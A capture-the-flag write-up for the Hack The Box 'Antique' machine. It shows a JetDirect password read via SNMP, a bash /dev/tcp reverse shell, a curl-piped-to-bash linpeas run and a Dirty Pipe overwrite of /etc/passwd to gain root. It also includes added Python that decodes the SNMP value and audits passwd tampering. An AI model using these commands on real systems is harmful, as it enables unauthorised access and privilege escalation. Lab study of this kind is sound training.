Antique Writeup

10 September 2022 #CTF #HTB #box #easy #linux

Antique info


Let's start this box with an nmap scan:

$ sudo nmap -sC -sV -oN enum/initial.nmap
23/tcp open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect

HP JetDirect

The nmap scan shows only one TCP port open, and nmap is not really sure what service is behind it. Fine, we'll check ourselves:

$ nc 23

HP JetDirect

Password: admin
Invalid password

HP JetDirect is a simple network printing protocol. Let's see if it has any known vulnerabilities:

$ searchsploit hp jetdirect
HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure

Sounds good.


SNMP is the Simple Network Management Protocol. It allows querying information about all kinds of settings, such as CPU temperature, disk usage and much more.

To confirm that SNMP is running we could perform a UDP nmap scan, but that takes so long that we'll go in blind instead.

Turns out the password for HP JetDirect can be queried over SNMP with basically no authentication, only the default 'public' community string:

$ snmpget -v 1 -c public .
iso. = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

It is hexadecimal so we should decode it:

$ echo -n '50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32' | xxd -r -p

I took the first line of output (not sure why there are 2) and it definitely looks good, but if we try this password:

$ nc 23

HP JetDirect

Password: P@ssw0rd@123!!12
Invalid password

But after adding a '3' at the end, it works.
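An added example (not part of the original writeup) that shows where the missing '3' went. Net-SNMP displays a value of type BITS as the raw octets in hex, followed by the positions of every bit that is set, with bit 0 being the most significant bit of the first octet. In the snmpget output above the 17th octet, 33, wrapped onto the second line right in front of that bit list, and 0x33 is the trailing '3'. The code below splits such a value back into octets and bit positions by checking that the positions recomputed from a candidate octet prefix match the listed ones, then decodes the octets; the input strings are copied from the snmpget output above, and the first-line-only variant reproduces the truncated password.

```python
"""Decode a Net-SNMP 'BITS:' display value: hex octets followed by set-bit positions."""

# Constructed from the snmpget output above, with the two wrapped lines joined back together.
SNMPGET_VALUE = (
    "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 "
    "33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 "
    "54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 "
    "122 123 126 130 131 134 135"
)

# Only the first line of that output, i.e. what gets decoded when the wrap is overlooked.
FIRST_LINE_ONLY = "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32"


def set_bit_positions(octets: bytes) -> list[int]:
    """Return the indexes of all set bits, numbered the SNMP way:
    bit 0 is the most significant bit of the first octet."""
    positions = []
    for byte_index, value in enumerate(octets):
        for bit in range(8):
            if value & (0x80 >> bit):
                positions.append(byte_index * 8 + bit)
    return positions


def is_hex_octet(token: str) -> bool:
    """True for a two-character hex token such as '50' or '3a'."""
    return len(token) == 2 and all(c in "0123456789abcdefABCDEF" for c in token)


def split_bits_value(value: str) -> tuple[bytes, list[int]]:
    """Split a BITS display into (octets, listed bit positions).

    Both halves are plain hex/decimal tokens, so the boundary is found by trying
    the longest all-hex prefix first and keeping the one whose recomputed bit
    positions equal the remaining tokens. A value with no bit list at all
    (e.g. a truncated copy) is returned unverified.
    """
    tokens = value.split()
    for k in range(len(tokens), 0, -1):
        prefix = tokens[:k]
        if not all(is_hex_octet(t) for t in prefix):
            continue
        octets = bytes(int(t, 16) for t in prefix)
        try:
            listed = [int(t) for t in tokens[k:]]
        except ValueError:
            continue
        if not listed or set_bit_positions(octets) == listed:
            return octets, listed
    raise ValueError("no consistent octet/bit-position split found")


def decode_bits_string(value: str) -> str:
    """Decode the octet part of a BITS display as ASCII text."""
    octets, _ = split_bits_value(value)
    return octets.decode("ascii")


if __name__ == "__main__":
    octets, positions = split_bits_value(SNMPGET_VALUE)
    print(f"{len(octets)} octets, {len(positions)} bits set")
    print("full value :", decode_bits_string(SNMPGET_VALUE))
    print("first line :", decode_bits_string(FIRST_LINE_ONLY))
```

Walking the candidate split from the longest hex prefix downwards means the 17-octet prefix is the first one whose recomputed positions (1, 3, 9, 17, ...) match the listed ones, so the wrapped octet is kept with the string instead of being mistaken for a bit position.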


Now that we have access to HP JetDirect, let's see what we can do:

$ nc 23

HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

How nice, there is a convenient exec command!

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)

Let's just get our reverse shell:

> exec bash -c 'bash -i >& /dev/tcp/ 0>&1'

Don't forget to set up your listener first.


After looking around without any success, I decided to run linpeas, a script that looks for privilege escalation vectors.

HTB boxes do not have internet access, so first download the script to your own box, then transfer it to the target box.

On your local box:

$ mkdir www
$ cd www
$ wget
$ python -m http.server
Serving HTTP on port 8000 ( ...

On the target box:

lp@antique:~$ curl -s | bash
Vulnerable to CVE-2021-4034

Vulnerable to CVE-2021-3560

Vulnerable to CVE-2022-0847

Damn, not 1, not 2, but 3 CVEs are exploitable on this box! Though the third one didn't exist yet when this box was released. But I'm going to try this one, you know, for fun (:

Dirty Pipe exploit

We'll use this repo. Just get the exp.c file and transfer it to the remote box.

Now compile:

lp@antique:~$ gcc exp.c -o pwn

This vulnerability in the Linux kernel allows an unprivileged local user to write to files they do not have write permission for. We can, for example, overwrite the /etc/passwd file to delete the password of the root user.

lp@antique:~$ head -n 1 /etc/passwd
lp@antique:~$ ./pwn /etc/passwd 1 ootz:

This is the example provided in the repo.

Let's think about what it does: we wrote 'ootz:' into the /etc/passwd file at offset 1 (one byte after the beginning of the file).

The ':' at the end of 'ootz:' overwrites the 'x', which is the password field:

lp@antique:~$ head -n 1 /etc/passwd

Now the root account (renamed to rootz) has an empty password field, meaning we can just log in as root:

lp@antique:~$ su rootz
rootz@antique:/home/lp# id
uid=0(rootz) gid=0(root) groups=0(root)
rootz@antique:/home/lp# ls /root
root.txt  snap
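To make the byte-level effect of that offset write concrete, and to show what a defender would look for afterwards, here is an added example that is not from the writeup or the exploit repo. It splices 'ootz:' into a constructed /etc/passwd line at offset 1 the way an in-place page-cache write would (same length, bytes replaced), then audits the result like a host integrity check: any uid 0 entry with an empty password field, or with a name other than root, is flagged. The passwd content is constructed for the example, not copied from the box.

```python
"""Simulate the documented /etc/passwd overwrite and audit the result."""

# Constructed sample file: a typical root entry plus two system accounts, not the box's own file.
PASSWD_BEFORE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n"
)


def overwrite_at_offset(content: str, offset: int, data: str) -> str:
    """Replace len(data) bytes starting at offset. The file length does not
    change, which is exactly what makes the trailing ':' land on the 'x'."""
    if offset < 0 or offset + len(data) > len(content):
        raise ValueError("write would fall outside the file")
    return content[:offset] + data + content[offset + len(data):]


def audit_passwd(content: str) -> list[tuple[int, str]]:
    """Return (line number, reason) for entries a defender should look at:
    a uid 0 account with an empty password field (no password is asked at all,
    /etc/shadow is never consulted) or a uid 0 account not named root."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), start=1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, f"malformed entry ({len(fields)} fields)"))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if not uid.isdigit():
            findings.append((lineno, f"non-numeric uid '{uid}'"))
            continue
        if int(uid) == 0:
            if passwd == "":
                findings.append((lineno, f"uid 0 account '{name}' has an empty password field"))
            if name != "root":
                findings.append((lineno, f"uid 0 account is named '{name}', not root"))
    return findings


def tampered_passwd() -> str:
    """The writeup's example: write 'ootz:' one byte into the file."""
    return overwrite_at_offset(PASSWD_BEFORE, 1, "ootz:")


if __name__ == "__main__":
    after = tampered_passwd()
    print("before:", PASSWD_BEFORE.splitlines()[0])
    print("after :", after.splitlines()[0])
    for lineno, reason in audit_passwd(after):
        print(f"line {lineno}: {reason}")
```

The same audit run over the pristine sample returns nothing, so it doubles as a quick check that a recovered /etc/passwd has been restored correctly; on a real host it belongs next to a file-integrity baseline (a stored hash of /etc/passwd), since the overwrite leaves the file size and line count untouched.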

And that's the box.

Key Takeaways